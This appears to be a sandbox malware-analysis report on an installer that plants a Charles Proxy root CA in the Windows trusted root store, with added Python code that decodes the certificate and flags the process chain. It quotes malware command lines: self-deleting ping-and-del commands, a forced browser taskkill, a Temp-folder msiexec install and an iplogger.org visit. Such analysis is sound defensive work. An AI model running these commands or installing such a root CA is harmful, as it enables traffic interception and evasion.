Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{EAE7D267-5452-4A56-A9A1-82205EB82BE5}" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings MicrosoftEdge.exe
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f
787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
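The two rows above are the most consequential change in this run. Setup.exe created a key under \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\, which is the machine-wide Trusted Root Certification Authorities store, and wrote a Blob value into it. The Blob is CryptoAPI's serialized certificate element: a run of records of uint32 property id, uint32 reserved (always 1), uint32 length and data, where property 3 (CERT_SHA1_HASH_PROP_ID) holds the SHA-1 thumbprint that also names the key and property 32 (CERT_CERT_PROP_ID) holds the DER certificate. Decoded, the hex on this page is a self-signed Charles Proxy root CA: subject CN "Charles Proxy CA (19 八月 2019, DESKTOP-BNAT11U)", OU=https://charlesproxy.com/ssl, O=XK72 Ltd, L/ST=Auckland, C=NZ, valid from 2000-01-01 to 2048-12-15, basicConstraints CA:TRUE, keyUsage keyCertSign, with the standard Charles comment extension. Charles generates such a CA on the machine that runs it and puts that machine's name and the date in the CN, so this one was built in August 2019 on DESKTOP-BNAT11U and shipped inside the installer rather than generated on the victim's host; whoever holds its private key can issue a certificate that Windows and every platform-store consumer will trust for any hostname, and so intercept the victim's TLS traffic. The Python below is an added example, not part of the report: it carries the report's Blob hex (the certificate's 281-byte comment extension is written as the ASCII it decodes to and re-encoded to the same bytes), verifies that the key name and the stored hash both equal SHA-1 of the DER, and pulls the fields above out of the certificate with a small DER walker so that it runs offline with the standard library alone.

```python
r"""Decode the CryptoAPI certificate Blob Setup.exe wrote under
HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>."""
import hashlib
import struct

KEY_NAME = "6C0CE2DD0584C47CAC18839F14055F19FA270CDD"  # registry key name = SHA-1 thumbprint

# Hex copied from the report's Blob value. NAME is the issuer and the subject (identical:
# self-signed); COMMENT is the Netscape-comment extension, hex on the page, re-encoded below.
NAME = (
    "3081aa313b303906035504030c32436861726c65732050726f78792043412028313920"
    "e58d81e69c8820323031392c204445534b544f502d424e415431315529"
    "31253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c"
    "3111300f060355040a0c08584b3732204c7464" "3111300f06035504070c084175636b6c616e64"
    "3111300f06035504080c084175636b6c616e64" "310b3009060355040613024e5a")
MODULUS = (
    "ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e5" "4b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd8"
    "23b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d31" "0bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c"
    "5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af0029860" "2300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c342"
    "85e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb" "9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d")
SIGNATURE = (
    "662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d653" "0e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a7"
    "6258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b25" "1de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689"
    "dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607" "c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae8"
    "1b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea" "008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576")
COMMENT = ("This Root certificate was generated by Charles Proxy for SSL Proxying. "
           "If this certificate is part of a certificate chain, this means that you're "
           "browsing through Charles Proxy with SSL Proxying enabled for this website. "
           "Please see http://charlesproxy.com/ssl for more information.")
BLOB_HEX = (
    "030000000100000014000000" "6c0ce2dd0584c47cac18839f14055f19fa270cdd"  # prop 3: SHA-1, 20 bytes
    "200000000100000050050000"                                             # prop 32: DER, 1360 bytes
    "3082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b0500"
    + NAME + "301e170d3030303130313030303030305a170d3438313231353039313533375a" + NAME
    + "30820122300d06092a864886f70d01010105000382010f003082010a0282010100" + MODULUS + "0203010001"
    + "a382017430820170300f0603551d130101ff040530030101ff"
    + "3082012c06096086480186f842010d0482011d13820119" + COMMENT.encode("ascii").hex()
    + "300e0603551d0f0101ff040403020204"
    + "301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f"
    + "300d06092a864886f70d01010b05000382010100" + SIGNATURE)


def parse_blob(blob: bytes) -> dict:
    """Split a serialized certificate element into {property_id: data}."""
    props, off = {}, 0
    while off < len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property record at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def der_read(buf: bytes, off: int = 0):
    """One DER TLV at off -> (tag, value, offset just past it)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                       # long form: the next n bytes hold the length
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length


def der_leaves(buf: bytes) -> list:
    """Depth-first (tag, value) list of every primitive element in buf."""
    leaves, off = [], 0
    while off < len(buf):
        tag, value, off = der_read(buf, off)
        leaves.extend(der_leaves(value) if tag & 0x20 else [(tag, value)])  # 0x20 = constructed
    return leaves


def describe(blob_hex: str, key_name: str) -> dict:
    """Report what was installed and whether key name, stored hash and DER agree."""
    props = parse_blob(bytes.fromhex(blob_hex))
    cert, stored = props[32], props[3].hex().upper()
    sha1 = hashlib.sha1(cert).hexdigest().upper()
    leaves = der_leaves(cert)

    def after_oid(oid_hex, tag, nth=0):
        # value of the first leaf carrying `tag` after the nth occurrence of OID `oid_hex`
        i = [k for k, (t, v) in enumerate(leaves) if t == 0x06 and v.hex() == oid_hex][nth]
        return next(v for t, v in leaves[i + 1:] if t == tag)

    cns = [after_oid("550403", 0x0C, n).decode() for n in (0, 1)]  # issuer CN, subject CN
    times = [v.decode() for t, v in leaves if t == 0x17]            # UTCTime: notBefore, notAfter
    key_usage = der_read(after_oid("551d0f", 0x04))[1]              # BIT STRING: unused bits, bits
    return {
        "thumbprint": sha1,
        "key_name_matches": key_name.upper() == stored,
        "stored_hash_matches": stored == sha1,
        "issuer_cn": cns[0], "subject_cn": cns[1],
        "not_before": times[0], "not_after": times[1],
        "is_ca": (0x01, b"\xff") in der_leaves(after_oid("551d13", 0x04)),  # basicConstraints cA
        "key_cert_sign": bool(key_usage[1] & 0x04),                          # KeyUsage bit 5
        "comment": der_read(after_oid("6086480186f842010d", 0x04))[1].decode(),
    }


if __name__ == "__main__":
    for field, value in describe(BLOB_HEX, KEY_NAME).items():
        print(f"{field:20} {value}")
```

On a host, the same thumbprint can be checked with `certutil -store Root 6C0CE2DD0584C47CAC18839F14055F19FA270CDD` and removed with `certutil -delstore Root 6C0CE2DD0584C47CAC18839F14055F19FA270CDD`; the Blob value of any other entry under that key can be exported and fed to `describe` the same way. The walker does not descend into BIT STRING or OCTET STRING contents, which is why the basicConstraints and keyUsage bodies are decoded explicitly.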
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3488 PING.EXE 1340 PING.EXE 4396 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4084 1613214372547.exe 4084 1613214372547.exe 2132 1613214377312.exe 2132 1613214377312.exe 3820 1613214382562.exe 3820 1613214382562.exe 2192 23E04C4F32EF2158.tmp 2192 23E04C4F32EF2158.tmp 3128 seed.exe 3128 seed.exe 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3900 MicrosoftEdgeCP.exe 3128 seed.exe 4496 AB48.exe 4632 B8A8.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 1236 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeMachineAccountPrivilege 804 msiexec.exe Token: SeTcbPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 804 msiexec.exe Token: SeTakeOwnershipPrivilege 804 msiexec.exe Token: SeLoadDriverPrivilege 804 msiexec.exe Token: SeSystemProfilePrivilege 804 msiexec.exe Token: SeSystemtimePrivilege 804 msiexec.exe Token: SeProfSingleProcessPrivilege 804 msiexec.exe Token: SeIncBasePriorityPrivilege 804 msiexec.exe Token: SeCreatePagefilePrivilege 804 msiexec.exe Token: SeCreatePermanentPrivilege 804 msiexec.exe Token: SeBackupPrivilege 804 msiexec.exe Token: SeRestorePrivilege 804 msiexec.exe Token: SeShutdownPrivilege 804 msiexec.exe Token: SeDebugPrivilege 804 msiexec.exe Token: SeAuditPrivilege 804 msiexec.exe Token: SeSystemEnvironmentPrivilege 804 msiexec.exe Token: SeChangeNotifyPrivilege 804 msiexec.exe Token: SeRemoteShutdownPrivilege 804 msiexec.exe Token: SeUndockPrivilege 804 msiexec.exe Token: SeSyncAgentPrivilege 804 msiexec.exe Token: SeEnableDelegationPrivilege 804 msiexec.exe Token: SeManageVolumePrivilege 804 msiexec.exe Token: SeImpersonatePrivilege 804 msiexec.exe Token: SeCreateGlobalPrivilege 804 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeMachineAccountPrivilege 804 msiexec.exe Token: SeTcbPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 804 msiexec.exe Token: SeTakeOwnershipPrivilege 804 msiexec.exe Token: SeLoadDriverPrivilege 804 msiexec.exe Token: SeSystemProfilePrivilege 804 msiexec.exe Token: SeSystemtimePrivilege 804 
msiexec.exe Token: SeProfSingleProcessPrivilege 804 msiexec.exe Token: SeIncBasePriorityPrivilege 804 msiexec.exe Token: SeCreatePagefilePrivilege 804 msiexec.exe Token: SeCreatePermanentPrivilege 804 msiexec.exe Token: SeBackupPrivilege 804 msiexec.exe Token: SeRestorePrivilege 804 msiexec.exe Token: SeShutdownPrivilege 804 msiexec.exe Token: SeDebugPrivilege 804 msiexec.exe Token: SeAuditPrivilege 804 msiexec.exe Token: SeSystemEnvironmentPrivilege 804 msiexec.exe Token: SeChangeNotifyPrivilege 804 msiexec.exe Token: SeRemoteShutdownPrivilege 804 msiexec.exe Token: SeUndockPrivilege 804 msiexec.exe Token: SeSyncAgentPrivilege 804 msiexec.exe Token: SeEnableDelegationPrivilege 804 msiexec.exe Token: SeManageVolumePrivilege 804 msiexec.exe Token: SeImpersonatePrivilege 804 msiexec.exe Token: SeCreateGlobalPrivilege 804 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 804 msiexec.exe 2192 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3288 MicrosoftEdge.exe 3900 MicrosoftEdgeCP.exe 3900 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1196 wrote to memory of 3992 1196 6489A2274AE24900.exe 94 PID 1196 wrote to memory of 3992 1196 6489A2274AE24900.exe 94 PID 1196 wrote to memory of 3992 1196 
6489A2274AE24900.exe 94 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 4040 1328 6489A2274AE24900.exe 103
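The WriteProcessMemory rows above and the process tree that follows contain several parent/child chains worth turning into detections: Setup.exe and the dropped 6489A2274AE24900.exe each spawn `cmd /c ping 127.0.0.1 -n 3 & del "<their own image>"` to wipe themselves after a delay, cmd.exe runs `taskkill /f /im chrome.exe`, msiexec.exe installs gdiview.msi straight out of the user's Temp directory, cmd.exe opens https://iplogger.org/14Zhe7 (a URL-shortening service that logs the visitor's IP address) with `start`, and seed.sfx.exe is launched with WinRAR-SFX-style `-p<password> -s1` switches. The Python below is an added example and not part of the report: it reconstructs some of the tree's process-creation records as Sysmon-style (pid, ppid, image, command line) events (constructed records; the PIDs, paths and command lines are the ones in the tree) plus one benign control, and runs rule functions over them. The rule names, the severities, and the "high when the deleted file is the parent's own image" escalation are assumptions of the example.

```python
"""Rules for the execution-chain patterns in this report's process tree, run over
Sysmon Event ID 1-style process-creation records (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path
    cmdline: str   # command line as logged


# Constructed records reproducing part of the report's tree. PID 5000 is a benign
# control (an operator pinging a host from a shell) and must not match anything.
EVENTS: List[ProcEvent] = [
    ProcEvent(1108, 0, r"C:\Users\Admin\AppData\Local\Temp\Setup.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Setup.exe"'),
    ProcEvent(804, 1108, r"C:\Windows\SysWOW64\msiexec.exe",
              r'msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"'),
    ProcEvent(1196, 1108, r"C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe",
              r"C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1"),
    ProcEvent(876, 1196, r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c taskkill /f /im chrome.exe"),
    ProcEvent(2832, 876, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im chrome.exe"),
    ProcEvent(3992, 1196, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"'),
    ProcEvent(3428, 1108, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"'),
    ProcEvent(3488, 3428, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 3"),
    ProcEvent(1724, 2192, r"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe",
              r'"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1'),
    ProcEvent(2060, 2192, r"C:\Windows\SysWOW64\cmd.exe", r'"cmd.exe" /c "start https://iplogger.org/14Zhe7"'),
    ProcEvent(5000, 4000, r"C:\Windows\System32\cmd.exe", "cmd /c ping 10.0.0.1 -n 3"),
]

PING_DEL = re.compile(r'ping\s+127\.0\.0\.1\b.*?&\s*del\s+"?(?P<target>[^"&]+?)"?\s*$', re.I)
MSI_TEMP = re.compile(r'/i\s+"?[^"]*?\\AppData\\Local\\Temp\\', re.I)
KILL_BROWSER = re.compile(r'/im\s+(chrome|firefox|msedge|iexplore|opera|brave)\.exe', re.I)
START_URL = re.compile(r'\bstart\s+"?https?://', re.I)
SFX_SWITCHES = re.compile(r'(?:^|\s)-p\S+\s+-s\d?(?:\s|$)')   # WinRAR SFX: -p<password> -s1

Rule = Callable[[ProcEvent, Optional[ProcEvent]], Optional[str]]


def is_image(ev: ProcEvent, name: str) -> bool:
    return ev.image.lower().endswith("\\" + name)


def self_delete_via_ping(ev, parent):
    m = PING_DEL.search(ev.cmdline)
    if not m or not is_image(ev, "cmd.exe"):
        return None
    # the spawning binary deleting its own image is the installer self-wipe seen here
    if parent and m["target"].strip().lower() == parent.image.lower():
        return "high"
    return "medium"


def browser_taskkill(ev, parent):
    if is_image(ev, "taskkill.exe") and KILL_BROWSER.search(ev.cmdline):
        return "high" if "/f" in ev.cmdline.lower().split() else "medium"
    return None


def msiexec_from_user_temp(ev, parent):
    return "medium" if is_image(ev, "msiexec.exe") and MSI_TEMP.search(ev.cmdline) else None


def cmd_start_url(ev, parent):
    return "medium" if is_image(ev, "cmd.exe") and START_URL.search(ev.cmdline) else None


def sfx_password_silent(ev, parent):
    return "medium" if SFX_SWITCHES.search(ev.cmdline) else None


RULES: List[Rule] = [self_delete_via_ping, browser_taskkill, msiexec_from_user_temp,
                     cmd_start_url, sfx_password_silent]


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule name, pid, severity) for every event a rule fires on."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        for rule in RULES:
            severity = rule(ev, by_pid.get(ev.ppid))
            if severity:
                hits.append((rule.__name__, ev.pid, severity))
    return hits


if __name__ == "__main__":
    for name, pid, severity in detect(EVENTS):
        print(f"{severity:6} {name:24} pid={pid}")
```

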